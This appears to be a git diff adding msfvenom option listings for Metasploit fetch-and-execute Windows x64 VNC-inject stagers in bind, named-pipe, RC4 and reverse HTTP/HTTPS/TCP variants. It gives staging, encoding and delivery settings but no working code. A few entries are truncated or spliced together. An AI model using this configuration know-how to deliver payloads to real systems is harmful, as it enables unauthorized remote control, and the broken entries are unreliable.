Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME TUrybFlJiedY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt new file mode 100644 index 0000000..c664de7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME uTGlynUV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt new file mode 100644 index 0000000..39eb497 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt @@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME lTqNNKuvH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt new file mode 100644 index 0000000..e9eaf98 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt @@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME BJBqCfWHhBIA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt new file mode 100644 index 0000000..b2ebc60 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GiDjTwViA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt new file mode 100644 index 0000000..e374d00 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/vncinject/reverse_http + Platform: Windows + Arch: cmd +Needs Admin: No + Total +Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_http: +========================= + +.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME DDEePhIid no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt new file mode 100644 index 0000000..500bf9b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt @@ -0,0 +1,107 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/vncinject/reverse_https + Platform: Windows + Arch: cmd +Needs Admin: No + Total s +Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_https: +========================= + +om> + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME UdFOFThcK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt new file mode 100644 index 0000000..9e60fde --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME reVMhjBNTG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 